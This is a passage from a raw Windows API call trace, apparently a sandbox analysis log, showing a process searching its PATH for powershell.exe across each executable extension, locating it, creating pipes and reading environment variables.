lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.152] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.152] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.152] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.153] CreateFileW (lpFileName="C:\\Windows\\powershell.exe" (normalized: "c:\\windows\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.153] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.com" (normalized: "c:\\windows\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.153] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.exe" (normalized: "c:\\windows\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.153] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.153] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.153] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.153] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.154] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.154] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.154] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.154] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.154] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.155] CreateFileW (lpFileName="C:\\Windows\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.155] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.155] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.155] VirtualAlloc (lpAddress=0xc0001aa000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001aa000 [0094.155] VirtualAlloc (lpAddress=0xc0001ac000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001ac000 [0094.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.156] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.156] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.156] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.157] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.157] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.158] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.158] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.158] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.158] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.158] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.158] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.159] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.159] CreateFileW (lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.159] VirtualAlloc (lpAddress=0xc0001ae000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001ae000 [0094.159] VirtualAlloc (lpAddress=0xc0001b0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001b0000 [0094.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0094.160] VirtualAlloc (lpAddress=0xc0001b2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001b2000 [0094.160] CreatePipe (in: hReadPipe=0xc0000cba10, hWritePipe=0xc0000cba18, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cba10*=0xdc, hWritePipe=0xc0000cba18*=0xd4) returned 1 [0094.160] VirtualAlloc (lpAddress=0xc0001b4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001b4000 [0094.161] CreatePipe (in: hReadPipe=0xc0000cba18, hWritePipe=0xc0000cba20, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cba18*=0xf4, hWritePipe=0xc0000cba20*=0xd0) returned 1 [0094.161] CreatePipe (in: hReadPipe=0xc0000cba18, hWritePipe=0xc0000cba20, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0xc0000cba18*=0xfc, hWritePipe=0xc0000cba20*=0xf8) returned 1 [0094.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc0001921a0, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb3c0 | out: lpFileInformation=0xc0000cb3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1 [0094.161] GetEnvironmentStringsW () returned 0x893340* [0094.161] VirtualAlloc (lpAddress=0xc0001b6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001b6000 [0094.162] VirtualAlloc (lpAddress=0xc0001b8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001b8000 [0094.162] VirtualAlloc (lpAddress=0xc0001ba000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001ba000 [0094.162] VirtualAlloc (lpAddress=0xc0001bc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001bc000 [0094.162] FreeEnvironmentStringsW (penv=0x893340) returned 1 [0094.162] VirtualAlloc (lpAddress=0xc0001be000, dwSize=0x2000, 